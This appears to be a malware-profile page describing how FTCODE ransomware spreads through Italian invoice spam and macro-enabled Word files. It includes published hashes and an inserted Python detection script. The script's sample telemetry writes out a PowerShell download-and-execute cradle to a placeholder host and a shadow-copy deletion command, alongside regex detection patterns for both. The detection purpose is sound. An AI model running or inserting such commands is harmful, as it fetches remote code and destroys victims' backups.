FTCODE ransomware encrypts user data with AES-256 (in CBC mode) + RSA-1024 and then demands a ransom of $500 to return the files. FTCODE mainly targets Italian companies. It spreads via an email spam campaign previously known to distribute JasperLoader and Gootkit: an invoice-themed email aimed at Italian users, in which the attackers attempt to convince the recipient to enable macros in a Word document.
The macro runs PowerShell to retrieve additional PowerShell code. This second-stage PowerShell script then issues a GET request to a remote URL to obtain a Visual Basic file similar to JasperLoader. Using JasperLoader as an installer, FTCODE prepares the environment by checking that the host is not already infected, generating a GUID, and creating a unique password for the host. Some system information, along with the GUID and password, is sent to the attacker's command-and-control server via a POST request. It also performs common ransomware functions, such as deleting backups and shadow copies. Finally, files matching a list of targeted extensions are encrypted, and a ransom note is left on the system with payment instructions for file recovery.
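The infection chain described above (Word macro spawning PowerShell, a PowerShell download cradle fetching the next stage, and backup/shadow-copy deletion before encryption) maps onto three process-creation behaviours that endpoint telemetry can correlate per host. The following Python script is an added detection example, not code from the page or from any vendor; the hashes are the two published above, while the command-line patterns, the event schema and the sample telemetry are constructed assumptions about how such events commonly look in Sysmon-style logs.

```python
"""Correlate FTCODE-style behaviours in process-creation telemetry (added example)."""
import re
from dataclasses import dataclass

# Hashes published on this page for the macro-laden document stage.
FTCODE_IOC_HASHES = {
    "a5af9f4b875be92a79085bb03c46fe5c",
    "b09bc9a25090cada55938367c7f12e692632afa2ed46d5e90eba29da84befafd",
}

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Assumed command-line shapes for the behaviours the page describes; these are
# common forms, not strings taken from the FTCODE sample itself.
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient)", re.I)
SHADOW_DELETE = re.compile(
    r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)


@dataclass
class ProcessEvent:
    """One process-creation record (assumed schema, Sysmon event 1 style)."""
    host: str
    parent_image: str
    image: str
    command_line: str
    loaded_file_hash: str = ""  # hash of a document the process opened, if the sensor reports it


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the detection labels that apply to a single event (empty if nothing matches)."""
    hits = []
    parent, image = _basename(event.parent_image), _basename(event.image)
    if parent in OFFICE_PARENTS and image in POWERSHELL_IMAGES:
        hits.append("office-spawned-powershell")
    if image in POWERSHELL_IMAGES and DOWNLOAD_CRADLE.search(event.command_line):
        hits.append("powershell-download-cradle")
    if SHADOW_DELETE.search(event.command_line):
        hits.append("shadow-copy-deletion")
    if event.loaded_file_hash.lower() in FTCODE_IOC_HASHES:
        hits.append("ftcode-ioc-hash")
    return hits


def score_host(events):
    """Aggregate labels per host so the chain can be judged as a whole, not event by event."""
    per_host = {}
    for ev in events:
        labels = classify(ev)
        if labels:
            per_host.setdefault(ev.host, set()).update(labels)
    return per_host


def is_ftcode_chain(labels):
    """The full chain needs all three behaviours; a hash hit alone is corroborating, not required."""
    required = {"office-spawned-powershell", "powershell-download-cradle", "shadow-copy-deletion"}
    return required <= labels


def flagged_hosts(events):
    """Hosts on which the complete macro -> cradle -> backup-tampering chain was observed."""
    return sorted(h for h, labels in score_host(events).items() if is_ftcode_chain(labels))


# Constructed sample telemetry; none of these records come from a real incident.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r'"WINWORD.EXE" /n "C:\Users\user\Downloads\Fattura.doc"',
                 loaded_file_hash="a5af9f4b875be92a79085bb03c46fe5c"),
    ProcessEvent("ws01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/stage2')\""),
    ProcessEvent("ws01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin.exe delete shadows /all /quiet"),
    # Benign admin activity on a second host: interactive PowerShell and a read-only vssadmin call.
    ProcessEvent("ws02", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-ChildItem C:\\Temp"),
    ProcessEvent("ws02", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin.exe list shadows"),
]

if __name__ == "__main__":
    for host, labels in score_host(SAMPLE_EVENTS).items():
        print(host, sorted(labels), "FTCODE chain" if is_ftcode_chain(labels) else "")
```

Scoring per host rather than per event is the point: an Office-spawned PowerShell or a single `vssadmin` call each produce false positives on their own, but the conjunction of the three behaviours on one machine is what the page's description of FTCODE actually predicts, and the document hash is kept as corroboration because the sample hashes change far more often than the technique does.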
FTCODE Ransomware Signatures
Family: TrojanDownloader:O97M/Obfuse.MX!MTB
MD5: a5af9f4b875be92a79085bb03c46fe5c
SHA256: b09bc9a25090cada55938367c7f12e692632afa2ed46d5e90eba29da84befafd
FTCODE Ransomware Download